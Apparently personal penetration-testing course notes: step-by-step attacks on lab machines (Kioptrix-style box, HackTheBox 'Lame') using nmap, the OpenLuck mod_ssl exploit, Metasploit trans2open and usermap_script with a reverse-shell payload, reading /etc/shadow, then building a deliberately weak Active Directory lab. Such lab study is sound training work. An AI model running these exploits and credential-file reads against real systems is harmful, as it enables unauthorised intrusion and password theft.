- 192.168.202.130/asdewgfnk : Copy IP address and paste screenshot
- root@kali:~# nmap --script=ssl-enum-ciphers -p 443 192.168.202.130
- Now taking a note
- Weak Ciphers
- 192.168.202.130 : Copy IP address and paste screenshot :- least strength F
- Now search for Apache 1.3.20 vulnerabilities on web
- Exploit Database https://www.exploit-db.com/
- root@kali:~# searchsploit apache
- Now trying to get more information on Port 139 open Samba smdb
- root@kali:~# smbclient -L \\\\192.168.202.130
- root@kali:~# smbclient -L \\\\192.168.202.130\\IPC$
- NESSUS scan report vulnerability - SMB Signing not required shown as vul.
- Now root@kali:~# msfconsole
- msf5> search smb
- msf5> use auxiliary/scanner/smb/smb_version
- msf5 auxiliary(scanner/smb/smb_version) > options
- msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
- msf5 auxiliary(scanner/smb/smb_version) > run
- root@kali:~# searchsploit samba 2.2
- There are more trans2open exploits
- msf5 auxiliary(scanner/smb/smb_version) > search trans2open
- msf5 auxiliary(scanner/smb/smb_version) > info exploit/linux/samba/trans2open
Now Continuation from earlier Apache searching the web for OPENLUCK vulnerabilities
root@kali:~# git clone https://github.com/heltonWernik/OpenLuck
Install ssl-dev library
apt-get install libssl-dev
gcc -o OpenFuck OpenFuck.c -lcrypto
Running the Exploit
./OpenFuck
./OpenFuck 0x6b 192.168.202.130 -c 40
After running the exploit the root privilege is gained
Now Trying to enumerate from the root using below commands
arp -a
route
sudo -l
pwd # working directory
Trying to get password hashes
cat /etc/shadow
Trying here to find some other connected sub networks using the above commands also.
Now root@kali:~# msfconsole
msf5>
msf5> search smb
msf5> use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > options
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.202.130
msf5 auxiliary(scanner/smb/smb_version) > run
Searching for samba 2.2.1a exploit on google
msf5 auxiliary(scanner/smb/smb_version) > search trans2open
msf5 auxiliary(scanner/smb/smb_version) > use exploit/linux/samba/trans2open
msf5 exploit(linux/samba/trans2open) > set rhosts 192.168.202.130
msf5 exploit(linux/samba/trans2open) > info
msf5 exploit(linux/samba/trans2open) > run
msf5 exploit(linux/samba/trans2open) > ^C # no connection came back, so the exploit is not working as configured; looking at other options
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > set payload linux/x86/shell_reverse_tcp
This is the non-staged payload: there is no slash in the name (shell_reverse_tcp).
For a staged payload there is a slash after shell (shell/reverse_tcp).
msf5 exploit(linux/samba/trans2open) > options
msf5 exploit(linux/samba/trans2open) > run
It was success and root access is achieved
Now connecting to HackTheBox HTB
Retired machine - Lame - 10.10.10.3
root@kali :~ # nmap -T4 -p- -A 10.10.10.3
22/tcp open ssh : When SSH is open brute force can be tried to open
139, 445 - netbios samba 3.0.20-Debian
root@kali :~ # ftp 10.10.10.3
Username and password :- anonymous
ftp > help
ftp> ls
Checking for exploit :- vsftpd 2.3.4 on google
Checking for exploit : - smbd 3.0.20 on google - got some info on username map script
Opening metasploit to search for username map script
Now root@kali:~# msfconsole
msf5>search usermap
msf5 exploit(multi/samba/usermap_script) > set rhosts 10.10.10.3
msf5 exploit(multi/samba/usermap_script) > run
cat /etc/shadow
arp -a
route
Check all the files for important data; for a CTF (capture the flag) you need to search through all the files to find the flag
****************************************************************************
02 - VULNERABLE MACHINE: ACTIVE DIRECTORY
Downloading ISO image from Microsoft
Setting up the VM installation:
WIN 2016 SERVER
- While setting up 2016 server, go to setting and remove the floppy drive component
- Setting up compromised password :- Admin : Password1
- PC to be discoverable = Yes
- Configure this local server
- Add roles & features
- Role based,next & next
- Active directory domain service - add features
- Next, next, install- close
- Click on the flag - Promote this server domain controller
- Add new forest
- Setting up compromised password :- Admin : Pass$123
- Next,next,next,next,install, after reboot
- Tools > Active Directory Users and Computers
- Marvel.local - Users - right-click - New User.
- CMD -ipconfig
- After adding fcastle to domain
- Server manager - Files shares and services - shares
- Top right- Tasks- New share - SMB share quick- click next
- select custom folder- then folder created, next, then, select enable access-based enumeration
- Next, then click create
WINDOWS 10 ENTERPRISE
- Domain join instead
- Just name localfrank/Password2, next-
- Skip Cortana
- Uncheck all then accept
- Rename the PC
- Network & internet settings :- change adaptor settings -properties - double click internet protocol version4 -
- Use the following DNS server address - copy the IP address from win 2016 serv
- Search domain - click connect -
- Join the domain - marvel.local
- fcastle/std user
- After creating share folder, mapping the folder
- Under mypc - then- computer options- map the drive - \\HYDRA\hackme.
Attack to be performed - LLMNR/NBT-NS poisoning
03 - VULNERABLE MACHINE : BLUE
[Screenshot: meterpreter/reverse_tcp]